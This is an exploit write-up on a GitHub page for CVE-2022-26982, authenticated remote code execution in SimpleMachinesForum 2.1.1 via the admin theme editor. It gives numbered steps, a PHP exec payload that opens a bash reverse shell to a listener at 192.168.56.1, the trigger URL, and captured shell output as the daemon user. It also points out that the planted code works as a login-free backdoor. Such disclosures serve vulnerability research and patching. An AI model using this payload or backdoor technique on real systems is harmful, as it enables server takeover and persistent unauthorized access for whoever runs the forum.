Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: Authenticated Remote Code Execution in SimpleMachinesForum 2.1.1
# Remote Code Execution in SimpleMachinesForum 2.1.1 and earlier allows remote attackers to execute arbitrary code via uploading a php web shell. SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718
# Date: 7th March 2022
# CVE ID: CVE-2022-26982
# Confirmed on release 2.1.1
# Vendor: https://download.simplemachines.org/
# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!
###############################################
#Step1- Login with Admin Credentials
#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php
#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>
#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page
#Step5- Now click on "Themes and Layout" and you will get the reverse shell:
E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:
listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276
bash: cannot set terminal process group (1334): Inappropriate ioctl for device
bash: no job control in this shell
daemon@debian:/opt/bitnami/simplemachinesforum$ whoami
whoami
daemon
daemon@debian:/opt/bitnami/simplemachinesforum$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@debian:/opt/bitnami/simplemachinesforum$